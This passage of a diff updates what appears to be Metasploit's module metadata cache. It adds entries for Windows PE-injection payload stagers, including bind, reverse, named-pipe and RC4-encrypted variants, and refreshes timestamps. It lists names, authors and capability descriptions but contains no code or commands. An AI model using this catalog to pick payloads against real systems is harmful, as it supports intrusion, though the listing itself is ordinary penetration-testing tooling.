+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_named_pipe": {
+    "name": "Windows Inject PE Files, Windows x86 Bind Named Pipe Stager",
+    "fullname": "payload/windows/peinject/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "UserExistsError"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_nonx_tcp": {
+    "name": "Windows Inject PE Files, Bind TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/peinject/bind_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_tcp": {
+    "name": "Windows Inject PE Files, Bind TCP Stager (Windows x86)",
+    "fullname": "payload/windows/peinject/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_tcp_rc4": {
+    "name": "Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/peinject/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_tcp_uuid": {
+    "name": "Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/peinject/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/find_tag": {
+    "name": "Windows Inject PE Files, Find Tag Ordinal Stager",
+    "fullname": "payload/windows/peinject/find_tag",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "skape <mmiller@hick.org>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Use an established connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/findtag_ord.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/find_tag",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_ipv6_tcp": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager (IPv6)",
+    "fullname": "payload/windows/peinject/reverse_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker over IPv6",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_named_pipe": {
+    "name": "Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/peinject/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_nonx_tcp": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/peinject/reverse_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_ord_tcp": {
+    "name": "Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/peinject/reverse_ord_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "spoonm <spoonm@no$email.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_ord_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager",
+    "fullname": "payload/windows/peinject/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp_allports": {
+    "name": "Windows Inject PE Files, Reverse All-Port TCP Stager",
+    "fullname": "payload/windows/peinject/reverse_tcp_allports",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp_allports",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp_dns": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager (DNS)",
+    "fullname": "payload/windows/peinject/reverse_tcp_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp_dns",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp_rc4": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/peinject/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp_rc4_dns": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
+    "fullname": "payload/windows/peinject/reverse_tcp_rc4_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp_rc4_dns",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/reverse_tcp_uuid": {
+    "name": "Windows Inject PE Files, Reverse TCP Stager with UUID Support",
+    "fullname": "payload/windows/peinject/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_windows/pingback_bind_tcp": {
    "name": "Windows x86 Pingback, Bind TCP Inline",
    "fullname": "payload/windows/pingback_bind_tcp",
@@ -161887,7 +164591,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-02 15:47:36 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/singles/windows/pingback_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/pingback_bind_tcp",
@@ -161920,7 +164624,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/pingback_reverse_tcp",
@@ -162102,7 +164806,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_ipv6_tcp",
@@ -162139,7 +164843,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_ipv6_tcp_uuid",
@@ -162174,7 +164878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_named_pipe",
@@ -162245,7 +164949,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_tcp",
@@ -162283,7 +164987,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_tcp_rc4",
@@ -162319,7 +165023,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_tcp_uuid",
@@ -162495,7 +165199,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_tcp",
@@ -162568,7 +165272,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_tcp_dns",
@@ -162606,7 +165310,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_tcp_rc4",
@@ -162644,7 +165348,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_tcp_rc4_dns",
@@ -162680,7 +165384,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_tcp_uuid",
@@ -162715,7 +165419,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-06-11 04:48:52 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_udp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/reverse_udp",
@@ -162994,7 +165698,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_ipv6_tcp",
@@ -163031,7 +165735,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_ipv6_tcp_uuid",
@@ -163066,7 +165770,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_named_pipe",
@@ -163136,7 +165840,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_tcp",
@@ -163174,7 +165878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_tcp_rc4",
@@ -163210,7 +165914,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_tcp_uuid",
@@ -163386,7 +166090,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_tcp",
@@ -163459,7 +166163,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_tcp_dns",
@@ -163497,7 +166201,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_tcp_rc4",
@@ -163535,7 +166239,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_tcp_rc4_dns",
@@ -163571,7 +166275,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
